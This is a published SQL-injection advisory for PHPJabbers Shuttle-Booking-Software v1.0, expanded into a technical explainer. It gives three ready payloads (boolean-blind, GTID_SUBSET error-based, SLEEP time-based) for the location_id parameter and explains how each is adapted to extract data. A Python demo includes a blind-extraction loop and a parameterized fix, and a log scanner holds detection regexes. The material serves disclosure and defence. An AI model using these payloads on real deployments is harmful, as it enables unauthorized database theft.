Shuttle-Booking-Software v1.0 - Multiple-SQLi
## Title: Shuttle-Booking-Software v1.0 - Multiple-SQLi
## Author: nu11secur1ty
## Date: 09/10/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/shuttle-booking-software/#sectionPricing
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The location_id parameter appears to be vulnerable to SQL injection
attacks. A single quote was submitted in the location_id parameter,
and a database error message was returned. Two single quotes were then
submitted and the error message disappeared.
An attacker can easily read all of the information in the database behind
this web application!
WARNING! All of you: Be careful what you buy! This will be your responsibility!
STATUS: HIGH-CRITICAL Vulnerability
[+]Payload:
```text
---
Parameter: location_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') AND 1347=1347 AND ('MVss'='MVss&traveling=from

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') AND GTID_SUBSET(CONCAT(0x716b786a71,(SELECT (ELT(9416=9416,1))),0x71706b7071),9416) AND ('dOqc'='dOqc&traveling=from

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') AND (SELECT 1087 FROM (SELECT(SLEEP(15)))poqp) AND ('EEYQ'='EEYQ&traveling=from
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Shuttle-Booking-Software-1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/09/shuttle-booking-software-10-multiple.html)
## Time spent:
01:47:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
Shuttle-Booking-Software v1.0: A Deep Dive into Multiple SQL Injection Vulnerabilities
On September 10, 2023, security researcher nu11secur1ty disclosed multiple SQL injection (SQLi) flaws in Shuttle-Booking-Software v1.0, a commercial web application from PHPJabbers for managing shuttle and transportation bookings. The injection point is the location_id parameter of a GET request to the public-facing pjFrontPublic controller (action pjActionGetDropoffs), which is reachable without authentication as part of the booking flow. The author rates the issue HIGH-CRITICAL.
Despite its seemingly innocuous purpose, the application carries a serious risk because a user-supplied value reaches a database query without validation or parameterization. An attacker can inject SQL into that query and read the contents of the database. Depending on the privileges of the database account the application connects with, the same flaw may also allow data to be modified or, in permissive MySQL configurations, files to be written to the server.
Understanding the Vulnerability: A Technical Breakdown
SQL injection occurs when an application builds a query by concatenating user input into SQL text instead of binding it as a parameter. Here the location_id value appears to be placed inside a quoted string literal within a WHERE clause: every payload in the advisory begins by closing a quote and a parenthesis, then appends its own conditions and re-opens a parenthesis so that the remainder of the original query still parses. Any value that reaches the query unescaped can therefore change its structure.
When the researcher submitted a single quote (') as the value of location_id, the server returned a database error of the kind MySQL produces for an unterminated string literal, for example:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1
This is the classic first sign of SQL injection: the quote terminated the literal early and left the rest of the query unparsable. When two single quotes ('') were submitted, the error disappeared, because MySQL treats a doubled quote inside a string literal as an escaped quote, so the query parsed again. Taken together, the two responses show that the raw value is being spliced into a quoted literal in the SQL text rather than passed as a bound parameter.
Exploitation Techniques: Multiple Attack Vectors
The advisory lists three distinct SQLi techniques that work against the parameter:
- Boolean-based Blind SQLi – Infers one bit per request from whether the page returns its normal content for a true versus a false injected condition.
- Error-based SQLi – Forces MySQL to raise an error whose message echoes attacker-chosen data, so query results can be read directly from the error text.
- Time-based Blind SQLi – Makes the database sleep only when an injected condition is true, so the response delay becomes the oracle when neither page content nor error output differs.
Together they show that the parameter is exploitable whether or not error messages are shown to the client, which is why the author rates the issue HIGH-CRITICAL.
Proof-of-Concept Exploits
Below are the three payloads reported in the advisory, each sent as the query string of a GET request to the application's front-end controller:
1. Error-Based SQL Injection (MySQL GTID_SUBSET)
controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') AND GTID_SUBSET(CONCAT(0x716b786a71,(SELECT(ELT(9416=9416,1))),0x71706b7071),9416) AND ('dOqc'='dOqc&traveling=from
Explanation: This payload exploits MySQL's GTID_SUBSET() function (available from MySQL 5.6), which raises an error that includes the offending argument when it is handed a string that is not a valid GTID set. CONCAT() wraps the value to be extracted between two marker strings (0x716b786a71 is 'qkxjq', 0x71706b7071 is 'qpkpq') so that the tool can locate it in the error message. In this detection payload the value is only ELT(9416=9416,1), which returns 1 because the condition is true, so the test proves nothing more than that injected data is echoed back in the error. For real extraction the (SELECT (ELT(...))) part is replaced by a subquery such as SELECT user() or a row from a table, and the result is read out from between the markers.
2. Boolean-Based Blind SQL Injection
controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') AND 1347=1347 AND ('MVss'='MVss&traveling=from
Explanation: This payload appends an always-true condition (1347=1347) to the query. If the server returns its normal response (the list of drop-off locations), the attacker knows the injected condition was evaluated as true. Changing the condition to one that is false (e.g., 1347=1348) empties the result set and changes the response; that difference is the oracle. Replacing the constant comparison with a condition on a subquery (for example, comparing one character of a column value against a threshold) lets the attacker extract data one bit per request without any of it being displayed.
3. Time-Based Blind SQL Injection (SLEEP)
controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') AND (SELECT 1087 FROM (SELECT(SLEEP(15)))poqp) AND ('EEYQ'='EEYQ&traveling=from
Explanation: This payload places SLEEP(15) inside a derived table so that the database pauses for 15 seconds while evaluating the injected expression. If the response arrives roughly 15 seconds later than a baseline request, the injection is confirmed even when page content and error output are identical for true and false conditions. For extraction the sleep is made conditional, e.g., IF(<condition>,SLEEP(15),0), so that the delay itself carries one bit per request. This method is the fallback when error messages are suppressed and the boolean oracle is unreliable.
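As an added example that is not part of the advisory or of the PHPJabbers code, the following Python script reconstructs the class of flaw described in this and the preceding sections, using SQLite in place of MySQL so that it runs offline: a location_id value spliced into a quoted literal, the single-quote and doubled-quote probe from the description, a true/false condition pair in the shape of the first payload, a boolean-blind extraction loop that pulls a value out of a constructed users table one character at a time, and the parameterized, allowlisted replacement the Recommendations section calls for. The table names, columns, rows and the exact query template are assumptions, since the real schema is not known from the advisory, and the MySQL-only functions GTID_SUBSET() and SLEEP() have no SQLite equivalent, so the error-based and time-based variants are not reproduced here.

```python
import re
import sqlite3

# Constructed sample schema and rows; the product's real schema is not known.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE dropoffs (id INTEGER PRIMARY KEY, location_id INTEGER, name TEXT);
        INSERT INTO dropoffs VALUES (1, 3, 'Airport Terminal A');
        INSERT INTO dropoffs VALUES (2, 3, 'Airport Terminal B');
        INSERT INTO dropoffs VALUES (3, 7, 'Central Station');
        CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT);
        INSERT INTO users VALUES (1, 'admin@example.test');
    """)
    return conn

def get_dropoffs_vulnerable(conn, location_id):
    """Hypothetical reconstruction of the flaw: the raw GET value is spliced into
    a quoted literal inside parentheses. The advisory's payloads close exactly
    such a context (') ... (') before appending their own conditions."""
    sql = "SELECT name FROM dropoffs WHERE (location_id = '%s')" % location_id
    return [row[0] for row in conn.execute(sql)]

def probe(conn, value):
    """The advisory's manual test. Returns 'error' when the database rejects the
    generated SQL, otherwise the number of rows. A lone quote terminates the
    literal early; a doubled quote is an escaped quote, so the query parses."""
    try:
        return len(get_dropoffs_vulnerable(conn, value))
    except sqlite3.OperationalError:
        return "error"

def oracle(conn, condition):
    """Boolean-blind oracle shaped like the advisory's first payload: close the
    literal and parenthesis, add a condition, reopen a parenthesis so the
    query's own trailing ')' still parses. True iff the normal rows come back."""
    payload = "3') AND (%s) AND ('x'='x" % condition
    return len(get_dropoffs_vulnerable(conn, payload)) > 0

def extract_string(conn, subquery, max_len=64):
    """Recover the scalar result of `subquery` one character at a time, binary
    searching each printable ASCII code with the oracle (about 7 requests per
    character). This is what 'steal all information' means in practice."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, "LENGTH((%s)) >= %d" % (subquery, pos)):
            break                       # past the end of the value
        lo, hi = 32, 126                # printable ASCII range, inclusive
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, "UNICODE(SUBSTR((%s), %d, 1)) > %d" % (subquery, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out

def get_dropoffs_safe(conn, location_id):
    """Hardened form: allowlist the value as a decimal integer, then bind it with
    a placeholder so the database never parses user input as SQL."""
    if not isinstance(location_id, str) or not re.fullmatch(r"[0-9]{1,10}", location_id):
        raise ValueError("location_id must be a positive integer")
    rows = conn.execute(
        "SELECT name FROM dropoffs WHERE location_id = ? ORDER BY id",
        (int(location_id),))
    return [row[0] for row in rows]

if __name__ == "__main__":
    db = make_db()
    print("3'   ->", probe(db, "3'"))        # error: unterminated string literal
    print("3''  ->", probe(db, "3''"))       # 0 rows, no error: quote was escaped
    print("true  ->", oracle(db, "1347=1347"))
    print("false ->", oracle(db, "1347=1348"))
    print("leak  ->", extract_string(db, "SELECT email FROM users WHERE id = 1"))
    print("safe  ->", get_dropoffs_safe(db, "3"))
    try:
        get_dropoffs_safe(db, "3') AND (1=1) AND ('x'='x")
    except ValueError as exc:
        print("safe  -> rejected:", exc)
```

The extraction loop never sees a single byte of the users table in any response; it only observes whether the drop-off list is empty or not, which is exactly the boolean oracle described above. The hardened function shows the two defences working together: the allowlist rejects anything that is not an integer before the database is involved, and the placeholder would keep the value inert even if the allowlist were missing.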
Impact and Risks
These vulnerabilities pose severe risks:
| Risk | Description |
|---|---|
| Data Theft | Attackers can extract sensitive data such as user credentials, payment details, and customer information. |
| Database Manipulation | Malicious queries can insert, update, or delete records, corrupting business data. |
| File Access and Possible Code Execution | If the application's database account holds the FILE privilege and secure_file_priv does not forbid it, SELECT ... INTO OUTFILE can write attacker-controlled files to the server, which becomes code execution when the target directory is served by the web server; LOAD_FILE() lets the attacker read server-side files such as configuration containing credentials. Neither is confirmed for this product; both depend on the deployment. |
| Reputation Damage | Compromised data can lead to legal liabilities and loss of customer trust. |
Recommendations and Mitigation
For the vendor, the fixes are the standard ones:
- Use Parameterized Queries – Replace string concatenation with prepared statements (in PHP, PDO or mysqli with bound parameters) so that the database never parses user input as SQL. This is the fix; everything below is defence in depth.
- Input Validation – location_id identifies a record, so accept only a positive integer (or an ID from a known list) and reject anything else before it reaches a query.
- Do Not Rely on Escaping – mysql_real_escape_string() was removed in PHP 7, and its mysqli replacement only protects quoted string contexts; escaping is not a substitute for prepared statements or an ORM that uses them.
- Enable Logging and Monitoring – Alert on database errors returned to clients and on requests whose parameters contain SQL fragments; a WAF (Web Application Firewall) can supply this detection layer.
- Regular Security Audits – Conduct penetration testing and code reviews of third-party software before it is deployed.
For users of Shuttle-Booking-Software v1.0, it is imperative to:
- Update to a fixed version as soon as the vendor provides one.
- Until then, restrict access to the vulnerable endpoint (controller=pjFrontPublic with action=pjActionGetDropoffs) or reject non-numeric location_id values at the web server or reverse proxy.
- Deploy a WAF (e.g., ModSecurity with the OWASP Core Rule Set) as a compensating and detective control, keeping in mind that WAF rules can be bypassed and do not remove the flaw.
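As an added example, not from the advisory or the vendor, the following Python script performs the kind of log-based detection the monitoring recommendation refers to. It runs over constructed web-server access-log lines that carry the advisory's own payloads URL-encoded, as a scanner would send them, URL-decodes each query parameter, matches indicators derived from the three payload types (quote breakout followed by AND/OR, MySQL error-based functions, SLEEP/BENCHMARK, UNION SELECT), and adds two low-noise heuristics: a non-numeric value in a parameter that should be an ID, and a quote in a value followed by a 5xx response, which is the single-quote probe from the description. The parameter names are the advisory's; the request path, client address, timestamps and log format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Indicators derived from the three payload types in the advisory plus the
# generic UNION shape. Each is applied to the URL-decoded parameter value.
INDICATORS = [
    ("quote-breakout", re.compile(r"'\s*\)?\s*(AND|OR)\b", re.I)),
    ("mysql-error-based", re.compile(r"\b(GTID_SUBSET|EXTRACTVALUE|UPDATEXML)\s*\(", re.I)),
    ("time-based", re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)),
    ("union-select", re.compile(r"\bUNION\b.{0,40}\bSELECT\b", re.I | re.S)),
]

# Parameters the application treats as record IDs; anything non-numeric is suspect.
NUMERIC_PARAMS = {"location_id", "index"}

# Matches the request line and status code of a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed log lines (not from a real server; path and address are assumed):
# a normal request, the single-quote probe, and the advisory's boolean and
# time-based payloads percent-encoded the way a scanner sends them.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Sep/2023:12:00:01 +0000] "GET /index.php?controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3&traveling=from HTTP/1.1" 200 412
203.0.113.5 - - [10/Sep/2023:12:00:02 +0000] "GET /index.php?controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3%27&traveling=from HTTP/1.1" 500 187
203.0.113.5 - - [10/Sep/2023:12:00:03 +0000] "GET /index.php?controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3%27%27%27%29%20AND%201347%3D1347%20AND%20%28%27MVss%27%3D%27MVss&traveling=from HTTP/1.1" 200 412
203.0.113.5 - - [10/Sep/2023:12:00:04 +0000] "GET /index.php?controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3%27%27%27%29%20AND%20%28SELECT%201087%20FROM%20%28SELECT%28SLEEP%2815%29%29%29poqp%29%20AND%20%28%27EEYQ%27%3D%27EEYQ&traveling=from HTTP/1.1" 200 412
"""

def scan_log(log_text):
    """Return one alert per suspicious parameter: line number, parameter name,
    decoded value and the list of reasons that fired."""
    alerts = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        status = int(m.group("status"))
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes, so encoded quotes and spaces are visible here.
        for name, value in parse_qsl(query, keep_blank_values=True):
            reasons = [label for label, rx in INDICATORS if rx.search(value)]
            if name in NUMERIC_PARAMS and not value.isdigit():
                reasons.append("non-numeric value for numeric parameter")
            # The description's manual probe: a quote in the value and a 5xx back.
            if "'" in value and status >= 500:
                reasons.append("quote in value followed by server error")
            if reasons:
                alerts.append({"line": lineno, "param": name,
                               "value": value, "reasons": reasons})
    return alerts

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print("line %(line)d %(param)s: %(reasons)s" % alert)
        print("    value:", alert["value"])
```

A lone apostrophe is deliberately not an indicator on its own, since legitimate values such as surnames contain one; it is only flagged when the server answered with a 5xx, which is the error-disclosure pattern the advisory relies on. The numeric-parameter check is the highest-signal rule here and is also the one a reverse proxy can enforce as a compensating control. Regex indicators of this kind are a detective layer only: comment insertion, alternative encodings and case tricks can evade them, which is why the page's primary recommendation remains prepared statements.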
Conclusion: A Cautionary Tale
nu11secur1ty’s discovery highlights a critical lesson: even seemingly simple software can harbor severe vulnerabilities. The fact that a commercial product like Shuttle-Booking-Software v1.0 is vulnerable to multiple SQL injection types underscores the importance of rigorous security testing—even for off-the-shelf applications.
As the cybersecurity landscape evolves, developers and administrators must prioritize secure coding practices. This case serves as a stark reminder: you are responsible for what you buy. If you deploy software without verifying its security posture, you risk exposing your organization to full-scale breaches.
For more details, refer to the original research at nu11secur1ty.com and the public proof-of-concept repository on GitHub.